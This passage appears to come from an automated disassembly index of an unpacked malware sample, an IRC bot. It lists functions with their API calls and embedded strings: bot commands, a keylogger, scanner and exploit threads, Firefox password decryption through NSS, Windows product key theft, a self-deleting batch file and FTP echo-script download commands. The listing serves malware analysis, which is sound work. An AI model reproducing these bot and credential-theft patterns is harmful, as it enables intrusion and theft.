</pre></td></tr><tr id="sub_40A226"><td><pre><a name="sub_40A226"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A226">sub_40A226</a>(caaf): "FTP sn" </pre></td></tr><tr id="sub_40A274"><td><pre><a name="sub_40A274"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A274">sub_40A274</a>(caaf): "VULN sniff" </pre></td></tr><tr id="sub_40A24D"><td><pre><a name="sub_40A24D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A24D">sub_40A24D</a>(caaf): "HTTP sn" </pre></td></tr><tr id="sub_40EE3F"><td><pre><a name="sub_40EE3F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40EE3F">sub_40EE3F</a>(cba9): NTDLL.RtlUnwind </pre></td></tr><tr id="sub_408B66"><td><pre><a name="sub_408B66"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408B66">sub_408B66</a>(ccdd): KERNEL32.GetTempPathA KERNEL32.CreateFileA KERNEL32.WriteFile KERNEL32.CloseHandle KERNEL32.GetModuleHandleA KERNEL32.GetModuleFileNameA KERNEL32.GetFileAttributesA KERNEL32.SetFileAttributesA KERNEL32.ExpandEnvironmentStringsA KERNEL32.CreateProcessA "%sdel.bat" "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"... "%%comspec%% /c %s %s" </pre></td></tr><tr id="sub_40AFA2"><td><pre><a name="sub_40AFA2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AFA2">sub_40AFA2</a>(d00d): NTDLL.RtlDeleteCriticalSection KERNEL32.InitializeCriticalSectionAndSpinCount KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error KERNEL32.Sleep KERNEL32.ExitThread "Failed to initialize critical section." "%s:%d, Scann3r thread: %d, Sub|thread: "... "Failed to star thr34d, error: <%d>." "Finished at %s:%d after %d minute(s) of"... </pre></td></tr><tr id="sub_4144B2"><td><pre><a name="sub_4144B2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4144B2">sub_4144B2</a>(d1c0): KERNEL32.GetModuleFileNameA KERNEL32.GetStdHandle KERNEL32.WriteFile "<program name unknown>" "..." "Runtime Error!\n\nProgram: " "\n\n" "Microsoft Visual C++ Runtime Library" </pre></td></tr><tr id="sub_40A29B"><td><pre><a name="sub_40A29B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A29B">sub_40A29B</a>(d8e2): KERNEL32.ExitThread WS2_32.htons WS2_32.inet_ntoa "-W00T- bind() failed, returned %d" "-W00T- WSAIoctl() failed, returned %d" "\"%s:%d\" to \"%s:%d\": - \"%s\"\n" "%s" "%s" </pre></td></tr><tr id="sub_408CE6"><td><pre><a name="sub_408CE6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408CE6">sub_408CE6</a>(daea): WS2_32.getsockname </pre></td></tr><tr id="sub_40DD0D"><td><pre><a name="sub_40DD0D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40DD0D">sub_40DD0D</a>(dc07): KERNEL32.GetModuleHandleA KERNEL32.GetProcAddress KERNEL32.ExitProcess "mscoree.dll" "CorExitProcess" </pre></td></tr><tr id="sub_4012BA"><td><pre><a name="sub_4012BA"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4012BA">sub_4012BA</a>(dcca): KERNEL32.GetModuleHandleA KERNEL32.GetModuleFileNameA KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First KERNEL32.Process32Next KERNEL32.CloseHandle "explorer.exe" "hidserv.exe" "WINLOGON.EXE" "SERVICES.EXE" </pre></td></tr><tr id="sub_40151D"><td><pre><a name="sub_40151D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40151D">sub_40151D</a>(dcca): KERNEL32.GetModuleHandleA KERNEL32.GetModuleFileNameA KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First KERNEL32.Process32Next KERNEL32.CloseHandle "explorer.exe" "hidserv.exe" "WINLOGON.EXE" "SERVICES.EXE" </pre></td></tr><tr id="sub_40BEF1"><td><pre><a name="sub_40BEF1"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40BEF1">sub_40BEF1</a>(dde9): WS2_32.select WS2_32.__WSAFDIsSet </pre></td></tr><tr id="sub_40AB64"><td><pre><a name="sub_40AB64"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AB64">sub_40AB64</a>(de01): "\\" </pre></td></tr><tr id="sub_40CDF0"><td><pre><a name="sub_40CDF0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CDF0">sub_40CDF0</a>(e1a4): KERNEL32.Sleep "%systemroot%\\system32\\cmd.exe" </pre></td></tr><tr id="sub_417423"><td><pre><a name="sub_417423"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_417423">sub_417423</a>(e1f4): "1#SNAN" "1#IND" "1#INF" "1#QNAN" </pre></td></tr><tr id="sub_40BB9B"><td><pre><a name="sub_40BB9B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40BB9B">sub_40BB9B</a>(e415): "CCCC" "0" "`" </pre></td></tr><tr id="sub_409FE8"><td><pre><a name="sub_409FE8"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409FE8">sub_409FE8</a>(e48d): KERNEL32.ExitThread "Done with (%iKB/sec)" </pre></td></tr><tr id="sub_408995"><td><pre><a name="sub_408995"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408995">sub_408995</a>(e49e): USER32.FindWindowA KERNEL32.CreateFileMappingA KERNEL32.MapViewOfFile USER32.SendMessageA KERNEL32.UnmapViewOfFile KERNEL32.CloseHandle "mIRC" </pre></td></tr><tr id="sub_4093BC"><td><pre><a name="sub_4093BC"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4093BC">sub_4093BC</a>(e6ee): KERNEL32.GetCurrentProcess KERNEL32.CloseHandle </pre></td></tr><tr id="sub_406231"><td><pre><a name="sub_406231"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406231">sub_406231</a>(e88e): KERNEL32.GetCurrentProcess "Application Data\\Mozilla\\Firefox" "\\" "\\profiles.ini" "r" "name=default" "path=" "/" </pre></td></tr><tr id="sub_401760"><td><pre><a name="sub_401760"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401760">sub_401760</a>(e91f): WS2_32.send </pre></td></tr><tr id="sub_40198E"><td><pre><a name="sub_40198E"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40198E">sub_40198E</a>(ea92): KERNEL32.GetSystemDirectoryA KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error KERNEL32.Sleep KERNEL32.GetTickCount WS2_32.WSACleanup KERNEL32.lstrcmpi WS2_32.inet_addr WS2_32.gethostbyaddr WS2_32.gethostbyname WS2_32.inet_ntoa KERNEL32.GetTempPathA KERNEL32.CreateProcessA " :" " " "!" "PING" "PONG %s\r\n" "JOIN %s %s\r\n" "NOTICE" "pong" "PONG %s\r\n" "001" "005" "302" "@" "433" "NICK %s\r\n" "KICK" "user %s logged out." "NOTICE %s :%s\r\n" "JOIN %s %s\r\n" "Nice Game Mr %s!" "NICK" ":%s%s" "PART" "QUIT" "353" "j0in3d channel %s." "user %s logged out." "PART" "NOTICE %s :%s\r\n" "PRIVMSG" "NOTICE" "332" "NOTICE" "�" "!" "s" "s" "Ok You're Here." "user %s(%s) logged in." "332" " :" "$%d-" "$%d" "$me" "$user" "$chan" "$rndnick" "$server" "$chr(" ")" "63" " " "rnick" "NICK %s\r\n" "winkey" "Found Key: %.29s" "killbot" "findbot" "Couldn't find Key" "die" "332" "logout" "user %s logged out.\r\n" "gftp" "svchost.exe" "password" "mircosoft" "ms.microsoft.com" "CFTP server: %s, port: %d, user: %s, pa"... "R.e.c.o.n.n.e.c.t" "QUIT :reconnecting" "d.i.s.c.o.n.n.e.c.t" "QUIT :later" "leave" "QUIT :later\r\n" "QUIT :%s\r\n" "http" "Server listening on IP: http://%s:%d, D"... "Failed to start server thread, error: <"... "httpstop" "Server" "firefox" "info" "WMI Performance Adapter Services" "bawha" "t" "sub" "List threads." "Failed to start list thread, error: <%d"... "pst" "log" "system" "driver" "�" "Goin TO Hell :D" "stop" "Scan" "Scanner" "procs" "Already running." "full" "Failed to start listing thread, error: "... "sn" "on" "Already running." "Failed to start Shit thread, error: <%d"... "off" "Carnivore stopped. (%d thread(s) stoppe"... "No Shit thread found." "killproc" "Process killed: %s" "Failed to ki|| process: %s" "killid" "Process killed ID: %s" "Failed to ki|| process ID: %s" "FIND" "Too many specified." "%s" "Random" "Sequential" "%s Scanner on %s:%d delay %d %d mins %d"... "Can not start scanner" "p0rt invalid." "nick" "NICK %s\r\n" "j" "p" "PART %s\r\n" "r" "killth" "all" "Stopped: %d thread(s)." "No active threads found." "Killed thread: %s." "Fail3d to ki|| thread: %s." "open" "open" "file opened." "couldn't open file." "dns" "%s -> %s" "could not resolve host" "mIRCMD" "Client not open." "pm" "act" "cyc" "332" "PART %s\r\n" "JOIN %s %s\r\n" "mode" "MODE %s\r\n" "repeat" "332" "%s %s %s :%s" "delay" "332" "%s %s %s :%s" "au" "bawha" "%s%s.exe" "Getting Update From: %s." "Failed to start download thread, error:"... "SHit must be different than current run"... "exe" "couldn't execute file." "du" "Getting URL: %s to: %s." "Failed to start transfer, error: <%d>." "skybye" "Starting: (%s:%s) for %s seconds." "Failed to start: <%d>." "find" "JOIN %s %s\r\n" "p0rt is invalid." "%s" "no IP." "%s" "Random" "Sequential" "%s Scann3r on %s:%d %d secs %d mins %d "... "sftp" "ms.microsoft.com" "mircosoft" "password" "svchost.exe" "JOIN %s %s\r\n" "USERHOST %s\r\n" </pre></td></tr><tr id="sub_4162D5"><td><pre><a name="sub_4162D5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4162D5">sub_4162D5</a>(eaec): KERNEL32.IsBadCodePtr </pre></td></tr><tr id="sub_417D91"><td><pre><a name="sub_417D91"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_417D91">sub_417D91</a>(edbf): "invalid string position" </pre></td></tr><tr id="sub_4060C7"><td><pre><a name="sub_4060C7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4060C7">sub_4060C7</a>(ee0e): "r" </pre></td></tr><tr id="sub_4072DA"><td><pre><a name="sub_4072DA"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4072DA">sub_4072DA</a>(f005): KERNEL32.CreateFileA KERNEL32.GetFileSize KERNEL32.SetFilePointer KERNEL32.ReadFile KERNEL32.CloseHandle </pre></td></tr><tr id="sub_41330B"><td><pre><a name="sub_41330B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41330B">sub_41330B</a>(f38f): KERNEL32.WriteFile NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_40B1D5"><td><pre><a name="sub_40B1D5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40B1D5">sub_40B1D5</a>(f4ac): KERNEL32.Sleep "svchost.exe" "password" "mircosoft" "ms.microsoft.com" "echo open %s %d > o&echo user %s %s >> "... "%s\r\n" </pre></td></tr><tr id="sub_40CCB2"><td><pre><a name="sub_40CCB2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CCB2">sub_40CCB2</a>(f975): WS2_32.recv </pre></td></tr><tr id="sub_414D0D"><td><pre><a name="sub_414D0D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414D0D">sub_414D0D</a>(f9e3): KERNEL32.FlushFileBuffers NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_40A610"><td><pre><a name="sub_40A610"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A610">sub_40A610</a>(face): WS2_32.getsockname KERNEL32.GlobalMemoryStatus KERNEL32.GetVersionExA KERNEL32.GetTickCount KERNEL32.GetComputerNameA ADVAPI32.GetUserNameA </pre></td></tr><tr id="sub_4150F4"><td><pre><a name="sub_4150F4"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4150F4">sub_4150F4</a>(fdb6): NTDLL.RtlSizeHeap </pre></td></tr></table><script> document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff"); </script> </html>

sub_outside():
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress
	KERNEL32.CloseHandle
	USER32.wsprintfA
	KERNEL32.lstrlen
	KERNEL32.lstrcpy
	KERNEL32.lstrcmp
	KERNEL32.lstrcpyn
	KERNEL32.Sleep
	KERNEL32.GetVersionExA
	KERNEL32.GetTickCount
	KERNEL32.GetLocaleInfoA
	WS2_32.socket
	WS2_32.connect
	WS2_32.send
	WS2_32.closesocket
	WS2_32.shutdown
	KERNEL32.GetModuleHandleA
	KERNEL32.GetCommandLineA
	KERNEL32.GetStartupInfoA
	KERNEL32.ExitProcess

sub_4143D4(0126):
	KERNEL32.SetUnhandledExceptionFilter

sub_40CCEB(017e):
	WS2_32.send

sub_41050F(0284):
	KERNEL32.ReadFile
	NTDLL.RtlGetLastWin32Error

sub_41533C(029e):
	KERNEL32.GetModuleFileNameA

	"Unknown security	failure	detected!"
	"A security error of unknown cause has b"...
	"Buffer overrun detected!"
	"A buffer overrun has been detected whic"...
	""
	"..."
	"\n\n"
	"Microsoft Visual C++ Runtime Library"

sub_40170D(068d):
	WS2_32.send

sub_4143C1(088b):
	KERNEL32.SetUnhandledExceptionFilter

sub_405D63(09a7):
	"failed"
	"%s Drive (%s): shit."
	"%s Drive (%s): %s Disk, %s Lib, %s ."

sub_406C59(0bcf):
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	KERNEL32.FileTimeToLocalFileTime
	KERNEL32.FileTimeToSystemTime
	KERNEL32.Sleep
	KERNEL32.FindClose

	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\nIndex of %s</TIT"...
	"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
	"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
	".."
	"."
	"PM"
	"AM"
	"%2.2d/%2.2d/%4d  %2.2d:%2.2d %s"
	"<%s>"
	"PRIVMSG %s :%-31s  %-21s\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s/"
	"\"><CODE>%.29s>/</CODE></A>"
	"\"><CODE>%s/</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"<%s>"
	"%-31s  %-21s\r\n"
	"PRIVMSG %s :%-31s  %-21s (%s bytes)\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s"
	"\"><CODE>%.30s></CODE></A>"
	"\"><CODE>%s</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"%-31s  %-21s (%i bytes)\r\n"
	"PRIVMSG %s :Found %s Files and %s Direc"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_40AA51"><td><pre><a name="sub_40AA51"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AA51"><font size=+2>sub_40AA51</a>(0e7b)</font>:<font color=brown>
	"%s: %s stopped. (%d thread(s)	stopped.)"...
	"%s: No %s thread found."
</font></pre></td></tr><tr id="sub_4124BE"><td><pre><a name="sub_4124BE"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4124BE"><font size=+2>sub_4124BE</a>(128c)</font>:<font color=darkgreen>
	KERNEL32.VirtualAlloc</font>
<font color=brown></font></pre></td></tr><tr id="sub_410733"><td><pre><a name="sub_410733"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_410733"><font size=+2>sub_410733</a>(1310)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40CA59"><td><pre><a name="sub_40CA59"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CA59"><font size=+2>sub_40CA59</a>(13dd)</font>:<font color=darkgreen>
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.socket
	WS2_32.connect
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket</font>
<font color=brown>
	"svchost.exe"
	"password"
	"mircosoft"
	"ms.microsoft.com"
	"cmd /c echo open %s %d >> ii &echo user"...
</font></pre></td></tr><tr id="sub_40A091"><td><pre><a name="sub_40A091"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A091"><font size=+2>sub_40A091</a>(1439)</font>:<font color=brown>
	"Bot	sniff"
	"JOIN	#"
	"302 "
	"366 "
	".login"
	".l"
	"scanning threads."
	"mIRC"
	"exploit"
	"exploiting"
	"JOIN	# "
	"sets mode: "
	"Irc"
	"keylog"
</font></pre></td></tr><tr id="sub_40C08F"><td><pre><a name="sub_40C08F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40C08F"><font size=+2>sub_40C08F</a>(16f7)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_4134BF"><td><pre><a name="sub_4134BF"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4134BF"><font size=+2>sub_4134BF</a>(18c2)</font>:<font color=darkgreen>
	KERNEL32.SetFilePointer
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_4176B7"><td><pre><a name="sub_4176B7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4176B7"><font size=+2>sub_4176B7</a>(1915)</font>:<font color=darkgreen>
	KERNEL32.SetEndOfFile
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_408D3F"><td><pre><a name="sub_408D3F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408D3F"><font size=+2>sub_408D3F</a>(1c57)</font>:<font color=brown>
	"."
	"10"
	"172"
	"16"
	"192"
	"168"
	"90"
	"0"
</font></pre></td></tr><tr id="sub_413F8C"><td><pre><a name="sub_413F8C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_413F8C"><font size=+2>sub_413F8C</a>(1c6d)</font>:<font color=brown>
	"exp"
	"exp"
	"log10"
	"log10"
	"log"
	"log"
	"pow"
	"pow"
	"pow"
	"log10"
	"log"
	"log2"
	"log2"
	"exp10"
	"exp2"
	"exp"
	"modf"
	"pow"
	"floor"
	"ceil"
	"atan"
</font></pre></td></tr><tr id="sub_414DF9"><td><pre><a name="sub_414DF9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414DF9"><font size=+2>sub_414DF9</a>(1ce8)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="start"><td><pre><a name="start"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#start"><font size=+2>start</a>(1edc)</font>:<font color=darkgreen>
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegDeleteValueA
	ADVAPI32.RegCloseKey</font>
<font color=brown>
	"WMI Performance Adapter Services"
</font></pre></td></tr><tr id="sub_412407"><td><pre><a name="sub_412407"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_412407"><font size=+2>sub_412407</a>(2299)</font>:<font color=darkgreen>
	NTDLL.RtlReAllocateHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.VirtualAlloc
	NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_4017B6"><td><pre><a name="sub_4017B6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4017B6"><font size=+2>sub_4017B6</a>(22cb)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown>
	"NOTICE"
	"PRIVMSG"
	"%s %s :%s\r\n"
</font></pre></td></tr><tr id="sub_41207C"><td><pre><a name="sub_41207C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41207C"><font size=+2>sub_41207C</a>(2585)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_414CA7"><td><pre><a name="sub_414CA7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414CA7"><font size=+2>sub_414CA7</a>(2923)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_414A6F"><td><pre><a name="sub_414A6F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414A6F"><font size=+2>sub_414A6F</a>(2d8c)</font>:<font color=darkgreen>
	KERNEL32.GetModuleFileNameA</font>
<font color=brown>
	"C:\\m_unpacker\\packed.exe"
</font></pre></td></tr><tr id="sub_40CD53"><td><pre><a name="sub_40CD53"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CD53"><font size=+2>sub_40CD53</a>(3167)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_415B4C"><td><pre><a name="sub_415B4C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415B4C"><font size=+2>sub_415B4C</a>(32a7)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.GetFileType
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_406761"><td><pre><a name="sub_406761"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406761"><font size=+2>sub_406761</a>(3310)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"/signons.txt"
	"/signons2.txt"
	"#2c"
	"#2d"
	"%s "
	":"
</font></pre></td></tr><tr id="sub_40479E"><td><pre><a name="sub_40479E"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40479E"><font size=+2>sub_40479E</a>(334a)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"PASS	%s\r\n"
</font></pre></td></tr><tr id="sub_409C44"><td><pre><a name="sub_409C44"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409C44"><font size=+2>sub_409C44</a>(3683)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown></font></pre></td></tr><tr id="sub_414EC1"><td><pre><a name="sub_414EC1"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414EC1"><font size=+2>sub_414EC1</a>(3bbd)</font>:<font color=darkgreen>
	KERNEL32.VirtualQuery
	KERNEL32.GetSystemInfo
	KERNEL32.VirtualAlloc
	KERNEL32.VirtualProtect</font>
<font color=brown></font></pre></td></tr><tr id="sub_416BBC"><td><pre><a name="sub_416BBC"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_416BBC"><font size=+2>sub_416BBC</a>(3cd4)</font>:<font color=darkgreen>
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress</font>
<font color=brown>
	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"
	"GetUserObjectInformationA"
	"GetProcessWindowStation"
</font></pre></td></tr><tr id="sub_40A920"><td><pre><a name="sub_40A920"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A920"><font size=+2>sub_40A920</a>(3cd7)</font>:<font color=darkgreen>
	KERNEL32.TerminateThread
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_411692"><td><pre><a name="sub_411692"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_411692"><font size=+2>sub_411692</a>(3ffc)</font>:<font color=darkgreen>
	KERNEL32.GetCPInfo</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C878"><td><pre><a name="sub_40C878"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40C878"><font size=+2>sub_40C878</a>(4153)</font>:<font color=darkgreen>
	WS2_32.socket
	KERNEL32.Sleep</font>
<font color=brown>
	"svchost.exe"
	"password"
	"mircosoft"
	"ms.microsoft.com"
	"cmd /k echo open %s %d > o&echo user %s"...
	"asn|445"
	"%s//	%s."
</font></pre></td></tr><tr id="sub_408E61"><td><pre><a name="sub_408E61"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408E61"><font size=+2>sub_408E61</a>(43d7)</font>:<font color=darkgreen>
	KERNEL32.GetVersionExA</font>
<font color=brown>
	"2"
</font></pre></td></tr><tr id="sub_411FE8"><td><pre><a name="sub_411FE8"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_411FE8"><font size=+2>sub_411FE8</a>(4634)</font>:<font color=darkgreen>
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress</font>
<font color=brown>
	"KERNEL32"
	"IsProcessorFeaturePresent"
</font></pre></td></tr><tr id="sub_40752D"><td><pre><a name="sub_40752D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40752D"><font size=+2>sub_40752D</a>(474d)</font>:<font color=darkgreen>
	KERNEL32.GetFileAttributesA
	KERNEL32.CreateFileA
	KERNEL32.GetFileSize
	KERNEL32.CloseHandle
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep</font>
<font color=brown>
	"\\%s"
	"%s"
	"%s%s"
	"\n"
	"*"
	"Worker thread	of s3rv3r thread: %d."
	"Failed to start work3r thread, error:	<"...
</font></pre></td></tr><tr id="sub_41602F"><td><pre><a name="sub_41602F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41602F"><font size=+2>sub_41602F</a>(47fe)</font>:<font color=darkgreen>
	KERNEL32.GetCPInfo
	KERNEL32.MultiByteToWideChar
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_412ED1"><td><pre><a name="sub_412ED1"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_412ED1"><font size=+2>sub_412ED1</a>(4979)</font>:<font color=darkgreen>
	KERNEL32.LCMapStringW
	NTDLL.RtlGetLastWin32Error
	KERNEL32.MultiByteToWideChar
	KERNEL32.WideCharToMultiByte
	KERNEL32.LCMapStringA</font>
<font color=brown></font></pre></td></tr><tr id="sub_415FE6"><td><pre><a name="sub_415FE6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415FE6"><font size=+2>sub_415FE6</a>(5463)</font>:<font color=darkgreen>
	KERNEL32.GetLocaleInfoA</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B31C"><td><pre><a name="sub_40B31C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40B31C"><font size=+2>sub_40B31C</a>(5483)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_401073"><td><pre><a name="sub_401073"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401073"><font size=+2>sub_401073</a>(550e)</font>:<font color=darkgreen>
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Module32First
	KERNEL32.SetFileAttributesA
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.Sleep
	KERNEL32.DeleteFileA
	WS2_32.send
	KERNEL32.Module32Next
	KERNEL32.CloseHandle</font>
<font color=brown>
	"PRIVMSG %s :T3rmina3d	and del3t3d %s\n"
</font></pre></td></tr><tr id="sub_411824"><td><pre><a name="sub_411824"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_411824"><font size=+2>sub_411824</a>(559a)</font>:<font color=darkgreen>
	KERNEL32.GetOEMCP
	KERNEL32.GetACP
	KERNEL32.GetCPInfo</font>
<font color=brown></font></pre></td></tr><tr id="sub_409718"><td><pre><a name="sub_409718"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409718"><font size=+2>sub_409718</a>(55bf)</font>:<font color=darkgreen>
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_406425"><td><pre><a name="sub_406425"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406425"><font size=+2>sub_406425</a>(56a9)</font>:<font color=darkgreen>
	KERNEL32.GetProcAddress</font>
<font color=brown>
	"nspr4.dll"
	"plds4.dll"
	"softokn3.dll"
	"NSS_Init"
	"NSS_Shutdown"
	"PK11_GetInternalKeySlot"
	"PK11_Authenticate"
	"PK11SDR_Decrypt"
	"PK11_CheckUserPassword"
	"PL_Base64Decode"
